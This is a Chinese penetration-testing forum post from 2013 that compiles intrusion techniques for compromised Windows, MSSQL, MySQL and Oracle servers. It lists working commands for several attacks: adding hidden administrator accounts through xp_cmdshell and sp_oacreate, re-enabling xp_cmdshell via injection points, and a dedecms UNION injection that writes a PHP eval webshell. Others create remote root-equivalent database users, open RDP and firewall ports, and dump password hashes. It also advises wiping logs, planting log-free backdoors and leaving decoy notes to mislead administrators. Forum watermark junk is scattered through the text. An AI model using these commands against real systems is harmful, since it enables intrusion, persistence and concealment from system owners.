中国网络渗透测试联盟

标题: 渗透技术大全 [打印本页]

作者: admin    时间: 2013-2-27 21:24
标题: 渗透技术大全

8 }. [1 v, E! R5 G; a' c0 Z$ l1.net user administrator /passwordreq:no6 I2 b+ G6 ~3 X( Z& a
这句的意思是"administrator帐号不需要密码",如果可以成功执行的话,3389登陆时administrator的密码就可以留空,直接登陆了,然后进去后再net user administrator /passwordreq:yes恢复就可以了8 Y3 J1 c& O4 X7 z
2.比较巧妙的建克隆号的步骤+ k- S1 j+ R/ j& O1 A% Q
先建一个user的用户# x' B& q) N4 h/ E0 Z
然后导出注册表。然后在计算机管理里删掉
/ _' q+ [3 \+ \4 L$ ]$ F在导入,在添加为管理员组
/ a$ m) K+ H! C0 e7 `3.查radmin密码* B! U8 W0 ~" ^# `1 U
reg save HKEY_LOCAL_MACHINE\SYSTEM\RAdmin c:\a.reg; g/ ~- x2 e4 d: G( l
4.[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Window NT\CurrentVersion\Image File execution options]% ]. @/ A) W4 @& S$ f
建立一个"services.exe"的项
4 |: H& S" t7 m6 B% [/ R1 u再在其下面建立(字符串值)' V" z3 b- ]9 {2 [0 B
键值为mu ma的全路径7 j6 w. }* @" s( `7 o1 C3 {
5.runas /user:guest cmd
5 t8 R# t: p0 q7 ^  x- T/ Y7 r1 u测试用户权限!/ Y! j. [2 d/ |9 e* w
6.、 tlntadmn config sec = -ntlm    exec master.dbo.xp_cmdshell \'tlntadmn config sec = -ntlm\'--   其实是利用了tlntadmn这个命令。想要详细了解,输入/?看看吧。(这个是需要管理员权限的哦)建立相同用户通过ntml验证就不必我说了吧?) J) [1 c( @. N. W& \
7.入侵后漏洞修补、痕迹清理,后门置放:. A2 B8 ?* A, Y% t, o; H( P+ R: X7 F
基础漏洞必须修补,如SU提权,SA注入等。DBO注入可以考虑干掉xp_treelist,xp_regread自行记得web目录;你一定要记得清理痕迹~sqlserver连接使用企业管理器连接较好,使用查询分析器会留下记录,位于HKEY_CURRENT_USER\Software \Microsoft\Microsoft SQL Server\80\Tools\Client\PrefServers。删除之;IISlog的清除可不要使用AIO类的工具直接完全删除日志~可以选择logcleaner类工具只删除指定IP的访问记录,如果你能gina到管理员密码则通过登陆他清理日志并通过WYWZ进行最后的痕迹清理。话说回来手动清理会比较安全。最后留下一个无日志记录的后门。一句话后门数个,标准后门,cfm后门我一般都不会少。要修改时间的哦~还有一招比较狠滴,如果这个机器只是台普通的肉鸡,放个TXT到管理员桌面吧~提醒他你入侵了,放置了某个后门,添加了某个用户~(当然不是你真正滴重要后门~)要他清理掉。这样你有很大的可能性得以保留你的真实后门$ \1 J3 r5 t1 q+ }. O- D. d8 K; n1 i& u6 B
8.declare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\windows\system32\cmd.exe /c7 C% g. f4 o: F: i, }

  ]4 I4 }" U- m$ r+ Q, kfor example
7 J2 n) n8 E! I/ Y8 q* h4 @
- v5 y. j$ y0 f$ wdeclare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\windows\system32\cmd.exe /c net user aptime aptime /add'0 X% u) P2 k9 z9 F8 o: h

9 a% h2 Z2 o6 ddeclare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\windows\system32\cmd.exe /c net localgroup administrator aptime /add'
+ A9 u; @& R9 V( j5 X# r) k
4 i: h: K/ j& Y$ N" z* A- S# Y9:MSSQL SERVER 2005默认把xpcmdshell 给ON了
4 \* J$ H4 B4 N( t0 E1 S2 q1 p1 K如果要启用的话就必须把他加到高级用户模式
6 J7 B  {- C+ L) ~% E' ^  _可以直接在注入点那里直接注入
' I( T: M7 K' J7 F* p3 sid=5;EXEC sp_configure 'show advanced options', 1;RECONFIGURE;EXEC sp_configure 'xp_cmdshell', 1;RECONFIGURE;--' v* T# m+ g; }5 W( F
然后;dbcc addextendedproc("xp_cmdshell","xplog70.dll");--
2 {) Q& u: ]- ?, Q& f+ s) Z1 K或者
+ f3 m+ ]1 n2 |$ ysp_addextendedproc xp_cmdshell,@dllname='xplog70.dll'
5 @9 i3 E+ A- e. E7 M' l来恢复cmdshell。" E% |( S) Y6 Z5 h3 ?

3 z. Z- d' D$ Y7 C" ~2 w& q分析器. l' ?9 w$ ^% D! V5 U: o3 t
EXEC sp_configure 'show advanced options', 1;RECONFIGURE;EXEC sp_configure 'xp_cmdshell', 1;RECONFIGURE;--' X. m) e2 N7 `, L4 S! _
然后;dbcc addextendedproc("xp_cmdshell","xplog70.dll")9 x; L& s, q4 L% d. u
10.xp_cmdshell新的恢复办法5 ^- ?6 r1 p* D8 g: z$ \: B6 H
xp_cmdshell新的恢复办法3 f  h- ]& m* u
扩展储存过程被删除以后可以有很简单的办法恢复:# Y: r1 X1 \. p7 l4 U  w& E* a' m! w- ]
删除
$ I2 L' v" o5 a" |3 g+ Pdrop procedure sp_addextendedproc+ Q- \+ T" w+ z1 W5 ?/ F; q
drop procedure sp_oacreate
/ K$ A# {$ u7 b; y- X* wexec sp_dropextendedproc 'xp_cmdshell'% o; k! ~  F( ^+ d/ d% n* O* {& b
) D& r- X5 [( Z: g
恢复- v9 m8 T5 T( D3 [
dbcc addextendedproc ("sp_oacreate","odsole70.dll")$ x% M4 j- L( M% Z4 t6 l" I
dbcc addextendedproc ("xp_cmdshell","xplog70.dll")
. k. y3 }: y( W" y
+ b: V8 M" a9 D! w$ T6 b这样可以直接恢复,不用去管sp_addextendedproc是不是存在( l9 y' C. P& l! [# I
. M* d2 k1 _! K/ J
-----------------------------
9 l1 M5 C+ T- b% R! |
) ~+ U1 e( A9 K/ ?删除扩展存储过过程xp_cmdshell的语句:5 l4 y1 N; Y( Q* |! n" h2 s
exec sp_dropextendedproc 'xp_cmdshell'
1 C2 Z) n9 K, R* U% q; E9 k
+ t1 @0 _) n6 ~恢复cmdshell的sql语句, e" q( b1 R3 {4 ^
exec sp_addextendedproc xp_cmdshell ,@dllname ='xplog70.dll'
7 o' Z! y$ a3 K+ q) \3 _/ v/ U* \# f" A, u) i
5 }% A% @( G8 s- p3 P9 u5 C$ i8 ?
开启cmdshell的sql语句6 B- \) M' C' k  s0 J
9 d1 K! g9 v+ E' r6 }5 v: [% R4 J
exec sp_addextendedproc xp_cmdshell ,@dllname ='xplog70.dll'% z, \: V/ U0 Y. }! n$ o

$ ^. I/ a3 q& `3 D* D6 L判断存储扩展是否存在; X* V+ E& k' C* `% q5 B7 V# r* v
select count(*) from master.dbo.sysobjects where xtype='x' and name='xp_cmdshell'
, f6 [7 h% \% f& ?3 X* S6 _- }3 F5 c4 c返回结果为1就ok
$ Y+ k8 y5 _2 [/ w: w
- I4 v# S: p# \5 ?5 x4 H! y恢复xp_cmdshell4 a  `3 w3 Z6 \! j- o- b/ {% @
exec master.dbo.addextendedproc 'xp_cmdshell','xplog70.dll';select count(*) from master.dbo.sysobjects where xtype='x' and name='xp_cmdshell'! f! X$ F5 ^* ?0 G* c: O( h. H/ c6 g
返回结果为1就ok- n# n( p0 J$ {4 m- Z

$ Y8 h- @; \! Z  c% E8 T6 }否则上传xplog7.0.dll) S9 ^. D( T8 m% {! I( [
exec master.dbo.addextendedproc 'xp_cmdshell','c:\winnt\system32\xplog70.dll'
- |6 X- k9 D: `6 ^0 y
, S2 }, N/ }. f9 p4 G- A% T堵上cmdshell的sql语句) I) c) ], l( f# ]6 P" {( {
sp_dropextendedproc "xp_cmdshel. Q* S3 T+ u; e
-------------------------* J8 W- E7 Y8 [$ [9 `4 j
清除3389的登录记录用一条系统自带的命令:
$ Z: z& [9 y2 Rreg delete "hkcu\Software\Microsoft\Terminal Server Client"  /f
( l5 D) f6 C9 |
4 v  h1 M0 T$ z! j6 F* r& R# d然后删除当前帐户的 My Documents 文件夹下的 Default.rdp 文件" K% q9 Q5 i' C7 J+ w: D1 a
在 mysql里查看当前用户的权限. L4 N; P2 f- ?1 L
show grants for  
8 g1 L) u3 {7 U6 x
2 a6 P9 q+ w! P5 R7 ?以下语句具有和ROOT用户一样的权限。大家在拿站时应该碰到过。root用户的mysql,只可以本地连,对外拒绝连接。以下方法可以帮助你解决这个问题了,下面的语句功能是,建立一个用户为itpro 密码123 权限为和root一样。允许任意主机连接。这样你可以方便进行在本地远程操作数据库了。
: E6 I( o' m' S& M
+ m& t0 I+ f! ~; A) F8 F$ x& m. u* L6 F  P! F1 i0 I' e- s0 y
Create USER 'itpro'@'%' IDENTIFIED BY '123';8 N/ @' r; U9 y. H' b7 C; f
% ?  Q7 G3 H2 ^" P, |
GRANT ALL PRIVILEGES ON *.* TO 'itpro'@'%' IDENTIFIED BY '123'WITH GRANT OPTION
7 z3 q& @6 r8 Z3 F+ S  Q9 G, f
  p# I8 b' L' u- lMAX_QUERIES_PER_HOUR 0 MAX_CONNECTIONS_PER_HOUR 06 t+ z" c. g6 F

, j5 e1 [1 c8 f: Y3 l) A% N; u5 MMAX_UpdateS_PER_HOUR 0 MAX_USER_CONNECTIONS 0;8 U; {3 k1 m, ~
- \) Q) _* t# A. b+ @" ?! k
搞完事记得删除脚印哟。& d6 N# w( q( R- w

: O" f2 R9 ~* P, i2 [- M9 e& IDrop USER 'itpro'@'%';# v; E& H7 r8 u  d4 z
9 ]/ \( W" j" S
Drop DATABASE IF EXISTS `itpro` ;1 ~0 V0 m1 ?$ E$ \, T. f
  F( Z& v; }5 X; x# A
当前用户获取system权限
- u0 V- I0 |7 r; N' psc Create SuperCMD binPath= "cmd /K start" type= own type= interact# W' w  }8 k  F
sc start SuperCMD1 q0 p6 b" W) y7 w& g+ h6 y; Z' ?
程序代码
2 l% a2 D; t" c! {9 J- \) a# M$ _<SCRIPT LANGUAGE="VBScript">
, L% ^) P$ }6 A( V4 V' u2 y  Zset wsnetwork=CreateObject("WSCRIPT.NETWORK")
) F4 {1 S2 \5 E& K$ |5 a3 O$ Z) |: q! pos="WinNT://"&wsnetwork.ComputerName
# F; o- s" a6 D( v  `: W5 WSet ob=GetObject(os)
" P3 I8 N8 n6 x3 A' c. k9 T# USet oe=GetObject(os&"/Administrators,group"); l$ D" M, O5 E2 ]: t9 O# O  V
Set od=ob.Create("user","nosec")  L4 P: {$ j* c. N. o! F6 b
od.SetPassword "123456abc!@#"7 u% y8 z5 t* J' ^% A, y6 L
od.SetInfo
2 R% _9 ?) }+ d2 ISet of=GetObject(os&"/nosec",user)+ m$ l4 v" d' ~" z
oe.add os&"/nosec"
0 ^( N" c# e  C</Script>
1 M" v8 h. b/ Z<script language=javascript>window.close();</script>1 |( m; q) E: T/ n6 Z8 ], u

$ |/ t1 J9 O9 p+ T# W! v1 E
9 y& c; T& {! y5 ^7 U+ y8 n4 _9 {4 @

8 W8 c; Q( n' t* `8 o4 ?突破验证码限制入后台拿shell
9 F& s3 V- y7 g. V2 g程序代码  W4 B; A4 u+ ~3 w3 s: R* |  B
REGEDIT4 ) j" i. v# i9 ^* x) l8 b
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\Security]
- g0 T2 |" ^: j  R! c"BlockXBM"=dword:00000000, ~5 b7 D7 l" K5 D, q
( W7 \' w8 o; s
保存为code.reg,导入注册表,重器IE1 L9 ^- b7 T8 Z- c) ]
就可以了/ g2 D" t# }& m
union写马
8 h1 G3 `( w7 D- Q* a3 Q& s程序代码# L. W: T& c) G' r5 ]2 s
www.baidu.com/plus/infosearch.php?action=search&q=%cf'%20union%20select%201,2,3,4,'<?php%20eval($_POST[cmd])?>',6+into+outfile+'D:\\wwwroot\\duizhang.php'+/*: ?+ N# u: B" F* R, g$ U

9 Q' p7 ^$ N" F' \5 r& \应用在dedecms注射漏洞上,无后台写马
' u/ q' T6 _- {1 N+ ?" qdedecms后台,无文件管理器,没有outfile权限的时候3 \* t9 n3 x+ Q) u. U+ ]3 @5 c* f5 X$ g2 a
在插件管理-病毒扫描里
6 F. }4 a; S$ }, w1 ^* ]8 b/ S% e' ^+ e写一句话进include/config_hand.php里* ~1 L( a; h5 R, t6 E
程序代码9 Y3 s4 {6 I, \3 [  X
>';?><?php @eval($_POST[cmd]);?>$ I5 I3 Z3 L- F# {6 `/ T

/ M& o# }5 V% g& C/ V3 P8 l7 b3 s' |  K$ b
如上格式1 W' `5 Z# D$ \7 B5 I$ s% S

4 E4 z9 ~2 v2 v9 O) f/ Doracle中用低权限用户登陆后可执行如下语句查询sys等用户hash然后用cain破解; ~" J" D1 Z' T! E4 @1 K$ ^4 {; q
程序代码
* j2 T* k! {+ y( @select username,password from dba_users;
$ d5 s. {' H! P9 D) W3 f
, H) H. u  F9 E# F/ |- n( r1 l2 i4 |* R& L1 Q
mysql远程连接用户6 I+ x5 `' t/ C6 [3 X  H0 m# a
程序代码! ]4 Y# Y/ }2 H; L# E7 x* P# D
! p& l" F& e  f" F
Create USER 'nosec'@'%' IDENTIFIED BY 'fuckme';
+ e6 P& V1 X/ u& A4 UGRANT ALL PRIVILEGES ON *.* TO 'nosec'@'%' IDENTIFIED BY 'fuckme' WITH GRANT OPTION
' n% J: P/ E7 l, t- hMAX_QUERIES_PER_HOUR 0 MAX_CONNECTIONS_PER_HOUR 02 I/ z5 q6 V0 v8 W# u& D: e
MAX_UpdateS_PER_HOUR 0 MAX_USER_CONNECTIONS 0;+ T, f2 }, _! M& @- q

( Y, y! R9 N- l, |  B
, I& S2 \: L4 W% h6 E# y/ s5 P' V! o6 [7 G, c
# S/ w, M" N1 c( B- R# W: `7 A
echo y |reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0
+ S$ H) L: t) c  s4 K: ?, h5 p% i! A2 K2 j+ L
1.查询终端端口
! y0 n. B5 N! o, N; g: W  c2 l
' C2 C1 [8 A- a! ?' V9 L" U1 p5 {xp&2003:REG query HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server\WinStations\RDP-Tcp /v PortNumber9 B0 y, \( |* z9 d4 Z6 q

3 x) k  M# y& p& I& l% \通用:regedit /e tsp.reg "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal server\Wds\rdpwd\Tds\tcp"
2 X1 c( _: Y9 w- W2 a5 `type tsp.reg. v4 j* e6 m8 J

: _( Y& D9 b: I0 `. c+ g2.开启XP&2003终端服务
. S( k8 B7 \5 w4 `* p" q; v! t% A6 l0 Z
: y# w0 A0 R8 f2 J9 N& S5 V8 y
REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server /v fDenyTSConnections /t REG_DWORD /d 0 /f
5 h# |- ^) g4 f" ?; L  C* N5 D* t3 y6 A" A# h

2 }8 h8 k6 X- U+ iREG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server /v fDenyTSConnections /t REG_DWORD /d 00000000 /f, _, h7 A. R1 |5 R  {* ?9 {

+ r0 y$ ]2 Q- O5 g3.更改终端端口为20008(0x4E28)
8 h7 h, R$ w. d1 h) w0 T5 Q; ^& X  N
REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server\Wds\rdpwd\Tds\tcp /v PortNumber /t REG_DWORD /d 0x4E28 /f
1 d) m: H. D+ F2 r' [7 t+ }3 m5 a3 @- P* u7 R# A
REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server\WinStations\RDP-Tcp /v PortNumber /t REG_DWORD /d 0x4E28 /f
) s7 {; y8 O- K1 x& |
3 b% ^9 _8 D0 \2 i6 I: m+ F4.取消xp&2003系统防火墙对终端服务3389端口的限制及IP连接的限制
! c8 `# R1 O: C! |7 i+ C( b
0 K% c  j  F3 P- }REG ADD HKLM\SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\GloballyOpenPorts\List /v 3389:TCP /t REG_SZ /d 3389:TCP:*:Enabledxpsp2res.dll,-22009 /f, w" p8 B* D/ N. {6 V; X# r3 d
* E+ k( w& m7 r+ b  o
! j! k9 p9 P# y9 G9 ?
5.开启Win2000的终端,端口为3389(需重启)) T6 i  n/ W' U$ h9 c

# l1 v+ }% Q% _+ e2 g6 r3 b: ?echo Windows Registry Editor Version 5.00 >2000.reg
0 V* J1 {! U$ U- ^. ?echo. >>2000.reg: `% [6 d& C/ U: M
echo [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\netcache] >>2000.reg
- h9 e$ O" t+ Q# [echo "Enabled"="0" >>2000.reg , _: N" c1 Q6 W7 J& H7 P
echo [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon] >>2000.reg
* T* |! s# ~9 J: w/ z1 _echo "ShutdownWithoutLogon"="0" >>2000.reg ! y% a/ W. B8 X) z& A
echo [HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\Installer] >>2000.reg
$ t, ^& p* r9 j2 j1 d+ i$ Lecho "EnableAdminTSRemote"=dword:00000001 >>2000.reg
% K( |3 U- Q' R1 Q3 u+ \echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server] >>2000.reg . g  r2 T9 p! v! z; B9 U
echo "TSEnabled"=dword:00000001 >>2000.reg
) [( W( Y7 t, w  T2 o8 xecho [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\TermDD] >>2000.reg 8 |! o% r# [0 I4 d( q; m2 M5 q: O
echo "Start"=dword:00000002 >>2000.reg ! }5 M# _, @0 i# |, `1 d' I
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\TermService] >>2000.reg . d/ d  i9 z) S4 q& M0 `: C
echo "Start"=dword:00000002 >>2000.reg # o3 K  @3 k0 J3 [1 ~$ }
echo [HKEY_USERS\.DEFAULT\Keyboard Layout\Toggle] >>2000.reg 7 Q/ o& Z5 e1 _' `2 G7 @# Q, z
echo "Hotkey"="1" >>2000.reg
' G/ h0 j4 M6 X9 [7 g6 iecho [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\Wds\rdpwd\Tds\tcp] >>2000.reg
0 d5 r' u3 i/ techo "ortNumber"=dword:00000D3D >>2000.reg
' G" f( P- K: O( g) hecho [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp] >>2000.reg 3 Y, B6 c0 ?* ]  z
echo "ortNumber"=dword:00000D3D >>2000.reg3 a0 k$ }; n+ b1 W1 ~" b* h
" j  K2 n$ g8 y) M, J
6.强行重启Win2000&Win2003系统(执行完最后一条一句后自动重启)
* i% r. q& j  n7 f- \. v6 o, @
/ b2 s1 w4 [( U  f@ECHO OFF & cd/d %temp% & echo [version] > restart.inf
  M" Y1 c! n( A1 k# Y* ]& {(set inf=InstallHinfSection DefaultInstall)% O0 j- W0 s* ~2 H  t! Q% r
echo signature=$chicago$ >> restart.inf
" T" d: d! F( J8 Mecho [defaultinstall] >> restart.inf# \5 J% Y" K* [6 n. K5 g
rundll32 setupapi,%inf% 1 %temp%\restart.inf
* I% Z2 u* {% W0 `1 f' T
  j" e+ N7 I( ^) M% C$ }" L6 m+ I0 T+ G" ^
7.禁用TCP/IP端口筛选 (需重启)
0 W/ o" W9 _$ Y. G; a/ P
6 w$ d, T4 ?& C' L& I! i& ?% AREG ADD HKLM\SYSTEM\ControlSet001\Services\Tcpip\parameters /v EnableSecurityFilters /t REG_DWORD /d 0 /f! V5 H# W4 ^! m+ T" y/ F( W  c

5 g7 |1 c- O1 o6 m1 I8.终端超出最大连接数时可用下面的命令来连接2 G! l8 A2 m( Z' ^4 R! `1 k
1 p8 A# o  C# u2 j8 p
mstsc /v:ip:3389 /console; K1 r4 f* T' o9 X# H7 I" O, e

' \- S. Y/ ?, M+ v. d7 @% R9.调整NTFS分区权限
+ ]6 C1 T: I+ T7 r: S* {1 z& e8 |8 [
cacls c: /e /t /g everyone:F (所有人对c盘都有一切权利). \1 J3 E7 t; q

* R# N% s' J+ Q9 j  [7 G! ecacls %systemroot%\system32\*.exe /d everyone (拒绝所有人访问system32中exe文件)4 t  q) c- ^9 h( o0 k

% r2 C/ f2 O, ]$ W( _4 R9 k------------------------------------------------------
4 k+ |$ T- F" _  J3389.vbs
8 _; g* d4 M' _% v2 `On Error Resume Next6 Q- l' Y+ \  [) w( q7 p, i
const HKEY_LOCAL_MACHINE = &H80000002
& ?. v' f( ?0 I. z. K2 _& tstrComputer = "."' c  @4 i: N* X5 E
Set StdOut = WScript.StdOut9 T" z  U5 x6 j4 N! C. ]) _: C
Set oreg=GetObject("winmgmts:{impersonationLevel=impersonate}!\\" &_
: I4 n5 F5 W& j  X0 i3 tstrComputer & "\root\default:StdRegProv")5 d. R  h0 v3 W: |* c  P/ a& q/ E1 q
strKeyPath = "SYSTEM\CurrentControlSet\Control\Terminal Server"* |! c9 h/ J8 c
oreg.CreateKey HKEY_LOCAL_MACHINE,strKeyPath) c! \* ~+ |9 B5 V8 d4 H$ m1 e
strKeyPath = "SYSTEM\CurrentControlSet\Control\Terminal Server\Wds\rdpwd\Tds\tcp"
0 R0 G/ R& q7 j) n! G, T- Poreg.CreateKey HKEY_LOCAL_MACHINE,strKeyPath
5 H" h$ O, N2 C& `! mstrKeyPath = "SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp"& y2 g) p9 t9 Z$ P
strKeyPath = "SYSTEM\CurrentControlSet\Control\Terminal Server"
* w9 C1 G/ M2 L! u6 _9 NstrValueName = "fDenyTSConnections"
4 N, |, I; B2 N* B+ {dwValue = 0
9 P$ ~# O  e7 b$ N3 uoreg.SetDWORDValue HKEY_LOCAL_MACHINE,strKeyPath,strValueName,dwValue
! {$ V" |6 _* ostrKeyPath = "SYSTEM\CurrentControlSet\Control\Terminal Server\Wds\rdpwd\Tds\tcp"+ D# G$ A, V) D$ ?/ {/ R
strValueName = "ortNumber"* Q( h7 ?; G" y) y
dwValue = 3389
5 q, [9 P& ]1 @oreg.SetDWORDValue HKEY_LOCAL_MACHINE,strKeyPath,strValueName,dwValue
3 ^9 F7 y" _& h+ g2 B2 }strKeyPath = "SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp"5 s  C( N( s6 ~2 ]
strValueName = "ortNumber"
0 Q( h. @; g/ P/ V+ x3 n- BdwValue = 3389
6 j4 V9 @8 x: w2 P7 G! yoreg.SetDWORDValue HKEY_LOCAL_MACHINE,strKeyPath,strValueName,dwValue% b" \+ t! C/ i, P
Set R = CreateObject("WScript.Shell") 5 r) w# z9 H$ t$ Z2 m5 M1 P$ ^/ Z
R.run("Shutdown.exe -f -r -t 0")
) H; e) V" F+ u- j& {6 P4 p( k( w/ m0 J  q+ D' G
删除awgina.dll的注册表键值
! m, r. F' V8 ~  k) z! m程序代码" y8 b" m( _/ @5 b# v

* c' ~2 }4 ^% H1 P  r; Z( X: ~reg delete "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon" /v GinaDLL /f
( o! c. C+ a  r4 z# L% N
1 J9 j7 \% q7 f* N8 a9 a1 P
( s3 B/ ]* F+ h4 c$ G& f6 l2 {& ?; m3 n; `& ]- t
% @: T5 @! Z' X  w" o1 Q
程序代码3 [7 d3 p* w& E5 W7 y' O
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Lsa\NoLMHash2 w9 |  ^/ l% H7 Q3 }$ N& J$ R
& b4 s3 L) \* O# e
设置为1,关闭LM Hash: q. I6 n- i. o+ N! A
$ k$ S3 s: q  K- \- z
数据库安全:入侵Oracle数据库常用操作命令
/ R# d) A8 Q2 T$ {最近遇到一个使用了Oracle数据库的服务器,在狂学Oracle+请教高手后终于搞到了网站后台管理界面的所有用户密码。我发现Oracle操作起来真是太麻烦,为了兄弟们以后少走些弯路,我把入侵当中必需的命令整理出来。
. M/ n1 V2 [: o5 X9 j8 v) k1、su – oracle 不是必需,适合于没有DBA密码时使用,可以不用密码来进入sqlplus界面。0 Q( D3 q' U) f( Q$ _4 o: r
2、sqlplus /nolog 或sqlplus system/manager 或./sqlplus system/manager@ora9i;
/ b2 }/ ^7 P- K) ~4 {" A8 G6 `& S3、SQL>connect / as sysdba ;(as sysoper)或1 C: f# Y0 N2 B: M) A. K
connect internal/oracle AS SYSDBA ;(scott/tiger). k0 Y: H0 [4 y
conn sys/change_on_install as sysdba;
! j9 |( ]' M2 v4 E( e  b4、SQL>startup; 启动数据库实例( Q* s9 J6 X$ y+ _" i: G4 u0 n0 j! I
5、查看当前的所有数据库: select * from v$database;
& R' G2 n- }9 E; rselect name from v$database;: \& V  \( B/ U, A% E
6、desc v$databases; 查看数据库结构字段  |4 s$ l6 A( D
7、怎样查看哪些用户拥有SYSDBA、SYSOPER权限:
3 h' E  x4 U# _' lSQL>select * from V_$PWFILE_USERS;0 O1 t# ~# j7 I. j
Show user;查看当前数据库连接用户
: L* a+ e8 g5 E$ H* |8、进入test数据库:database test;( [6 w% |% t% A
9、查看所有的数据库实例:select * from v$instance;: K2 [- M' g! b/ I/ ]: O
如:ora9i
& n3 C& O8 f* [( ^) F: j* _0 R10、查看当前库的所有数据表:' U$ f+ T0 H% o9 @
SQL> select TABLE_NAME from all_tables;0 ?  R# M. P( j9 C5 L
select * from all_tables;% z* ]. v7 R5 Y
SQL> select table_name from all_tables where table_name like '%u%';8 [4 L+ n* v, p
TABLE_NAME  b* y8 H' X/ K; t5 S" S% X  j
------------------------------
8 A; I9 T8 Z( W* g0 S8 l5 N  h_default_auditing_options_) y* [+ |, @2 G
11、查看表结构:desc all_tables;
8 b. R: R5 D8 y# O  G12、显示CQI.T_BBS_XUSER的所有字段结构:# o) k$ [$ ]6 \+ q7 F- \% {
desc CQI.T_BBS_XUSER;
' U' j8 D" e1 z& U13、获得CQI.T_BBS_XUSER表中的记录:
8 W, b( T8 N! Z0 O$ sselect * from CQI.T_BBS_XUSER;* C2 i" t- n' `6 N( q
14、增加数据库用户:(test11/test)( C* m+ z0 r! q8 ?7 i1 T# j7 F
create user test11 identified by test default tablespace users Temporary TABLESPACE Temp;
8 d) N4 C* M, G% P5 c6 E15、用户授权:3 h% _4 Y0 c& ^( J  }
grant connect,resource,dba to test11;( f- f  s/ m  w% R+ H5 T4 L
grant sysdba to test11;, C8 p% _6 a4 T. L
commit;9 ?5 c# X$ }* V
16、更改数据库用户的密码:(将sys与system的密码改为test.)
0 i$ i5 k: D8 V3 Q. ^! K) |alter user sys indentified by test;
( }, N. O, [2 V- K! @2 g- i8 Palter user system indentified by test;' X4 {5 J- y+ n0 f" v$ M+ ~  _

* k- j) V3 t. z4 |9 s4 xapplicationContext-util.xml, ]- w0 m+ [( Q: P8 O2 A
applicationContext.xml; M' L4 M. y. S9 S& `3 T0 E+ a/ ]7 F
struts-config.xml
3 U) t. _. n- r3 k4 Hweb.xml
* H& A! |1 A. S% W! D6 oserver.xml3 ?) i, G4 R* @( `: _
tomcat-users.xml4 e5 B8 N8 ]. L$ p- P! O8 P9 l
hibernate.cfg.xml" X7 o3 P( R) f% @( f
database_pool_config.xml4 Y  p. a) t' t: ]! ?7 U
) I1 V* n+ W6 |

# ]: o5 N9 ~. P+ i: ?\WEB-INF\classes\hibernate.cfg.xml 数据库连接配置  E9 ~) a3 u9 y
\WEB-INF\server.xml         类似http.conf+mysql.ini+php.ini
9 r# Q8 q9 V6 ?; A% G\WEB-INF\struts-config.xml  文件目录结构
! ^4 U# G) }7 f  E5 l- c; O* `! e& U- U
spring.properties 里边包含hibernate.cfg.xml的名称
+ R; I7 y. N! E3 W4 M" q6 O
. g& ~  i7 H! E; H1 k
+ c; I0 s0 |  \C:\Program Files\Apache Software Foundation\Tomcat 5.5\conf\tomcat-users.xml
! o, h+ T7 @- i  r  d9 J* Q% e4 O2 z3 W, E
如果都找不到  那就看看class文件吧。。
' C4 k- k! I6 @% X5 X  v7 X! I- x4 Y* ~2 k+ Y
测试1:
3 J" K' C4 n$ x$ X( ~SELECT top 1 name=STUFF((SELECT ','+[name] FROM sysobjects t  where xtype='U' FOR XML PATH('')), 1, 1, '') FROM sysobjects t1( T0 a7 E2 n; h2 p' i
, k( ?9 j& g% U  c1 k
测试2:
- O' N2 i7 V, D6 j1 k' g& E2 t, {6 F; I4 n% r* O
create table dirs(paths varchar(100),paths1 varchar(100), id int)/ b0 E1 N! n8 v9 E

7 J- U# `" T$ W' Z! P' J8 u5 ?) @delete dirs;insert dirs exec master.dbo.xp_dirtree 'c:\',1,1--
$ {& f) ]4 C3 k3 x
0 ]/ y, Z. g9 jSELECT top 1 paths=STUFF((SELECT ','+[paths] FROM dirs FOR XML PATH('')), 1, 1, '') FROM dirs t1
- B& {$ ]1 H/ k5 z3 g- H" l# F9 K8 [/ s
查看虚拟机中的共享文件:8 O. C2 @. q- N4 Y
在虚拟机中的cmd中执行! z* d7 B6 n! }- Y* I1 w3 l! T) E
\\.host\Shared Folders& S- N' w# o7 b1 w

. M* R, j2 |3 V" Vcmdshell下找终端的技巧6 F8 w6 f7 D4 k( ~2 P9 d
找终端:
7 c! H* v7 v+ z- W/ x6 P第一步: Tasklist/SVC 列出所有进程,系统服务及其对应的PID值! - G7 i, b0 B, @
   而终端所对应的服务名为:TermService
$ c2 n" h; l+ F# d) Y& H, P8 g, P& d第二步:用netstat -ano命令,列出所有端口对应的PID值!
7 k/ p, n/ \; ^" z' _' ?2 I& Y( S   找到PID值所对应的端口
' H) A1 D# H* ]- i0 K
* w9 B2 G: N; r- B" P( p' N9 u1 [查询sql server 2005中的密码hash( }* A, O0 D% v9 w1 ^& ?/ y
SELECT password_hash FROM sys.sql_logins where name='sa'' \; Z0 K- ]2 `) B0 Y: V8 l
